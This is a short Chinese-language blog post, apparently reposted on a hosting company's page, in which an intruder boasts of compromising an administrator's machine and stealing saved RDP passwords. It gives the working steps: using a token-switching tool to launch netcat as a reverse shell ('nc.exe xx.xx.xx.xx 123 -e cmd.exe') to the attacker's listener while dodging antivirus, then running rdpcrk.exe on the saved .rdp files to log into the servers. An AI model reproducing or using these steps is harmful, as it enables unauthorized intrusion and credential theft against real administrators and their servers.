將系統(tǒng)權限轉換為用戶權限

幾天前費了不少力氣拿到一管理員機器，主站我盤旋了很久，沒有突破口，開了80，還有一個高端端口，當然就是3389了，一陣欣喜，管理員一定會登這個服務器的3389的。
     現(xiàn)在機器是拿到了，翻了翻管理員機器里的東西，本來想裝鍵盤記錄的，發(fā)現(xiàn)有很多以ip命名的rdp文件，下了一個下回來打開看了一下，真幸運，保存了密碼在rdp文件里的（這種情況只有讀rdp的密碼了，鍵盤記錄記不到）。主站和各分站的3389都是以保存密碼登錄的，上傳一個讀取rdp密碼的東西就可以讀到密碼了，但這時遇到一個很頭痛的問題，我的馬是系統(tǒng)權限的馬，讀取rdp文件的密碼必須要在用戶權限下。想裝一個用戶權限的馬上去，可手里沒好馬，管理員機器上裝了個卡巴斯基，還開了主動防御。試著折騰了一下，裝其它的馬，都被主動防御攔截，管理員還似乎有點發(fā)覺，開始檢查機器，幸好這個馬還穩(wěn)當，先斷開連接。
     接下來仔細想了一下，到底咋搞呢，必須要得到一個用戶權限的shell，再上傳馬上去執(zhí)行就不敢了，搞不好把現(xiàn)在的這個權限都弄掉。
     最后想起一個令牌轉換的東西，試了一下直接用令牌轉換工具運行rdpcrk.exe 加參數(shù)重定向到文本，結果沒讀取成功。于是就想到用nc通過令牌轉換彈一個用戶權限的shell回來。
在馬里面執(zhí)行cmd：change.exe  c:\windows\nc.exe xx.xx.xx.xx 123 -e cmd.exe
在本地臨聽123端口，接到shell后，傳個東西上去，whoami,呵呵，終于得到一個用戶權限的shell。
然后rdpcrk.exe  xx.xx.xx.xx.rdp
成功得到密碼，直登服務器，搞定。

億恩科技地址(ADD)：鄭州市黃河路129號天一大廈608室 郵編(ZIP)：450008 傳真(FAX)：0371-60123888
   聯(lián)系：億恩小凡
   QQ：89317007
   電話:0371-63322206

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質保障！--億恩科技[ENKJ.COM]